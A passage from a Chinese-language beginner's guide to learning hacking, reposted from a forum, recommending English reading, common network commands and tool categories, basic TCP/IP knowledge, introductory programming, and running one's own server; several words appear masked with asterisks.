学习英文对于黑客来说非常重要，因为现在大多数资料和教程都是英文版本，而且有关黑客的新闻也是从国外过来的，一个漏洞从发现到出现中文介绍，需要大约一个星期的时间，在这段时间内 *** 管理员就已经有足够的时间修补漏洞了，所以当我们看到中文介绍的时候，这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的 *** 安全网站。

二、学会基本软件的使用：

这里所说的基本软件是指两个内容：一个是我们日常使用的各种电脑常用命令，例如ftp、ping、net等；另一方面还要学会有关黑客工具的使用，这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多，功能各不相同，所以本书在后面将会介绍几款流行的软件使用 *** ，学习者在掌握其基本原理以后，既可以选择适合自己的，也可以在“第二部分”中找到有关软件的开发指南，编写自己的黑客工具。

三、初步了解 *** 协议和工作原理：

所谓“初步了解”就是“按照自己的理解方式”弄明白 *** 的工作原理，因为协议涉及的知识多且复杂，所以如果在一开始就进行深入研究，势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议，尤其是浏览网页的时候 *** 是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容，此部分内容将会在后面的章节中进行具体介绍。

四、熟悉几种流行的编程语言和脚本：

同上面所述一样，这里也不要求学习者进行深入学习，只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言，另外对于htm超文本语言和php、java等做基本了解，主要学习这些语言中的“变量”和“数组”部分，因为语言之间存在内在联系，所以只要熟练掌握其中一们，其他语言也可以一脉相同，建议学习C语言和htm超文本语言。

五、熟悉 *** 应用程序：

*** 应用程序包括各种服务器软件后台程序，例如：wuftp、Apache等服务器后台；还有网上流行的各种论坛、电子社区。有条件的学习者更好将自己的电脑做成服务器，然后安装并运行一些论坛代码，经过一番尝试之后，将会感性的弄清楚 *** 工作原理，这比依靠理论学习要容易许多，能够达到事半功倍的效果

/本篇文章来源于 新贵网 原文出处：http://www.2xg.cn/?dp-bbsthread-67435.html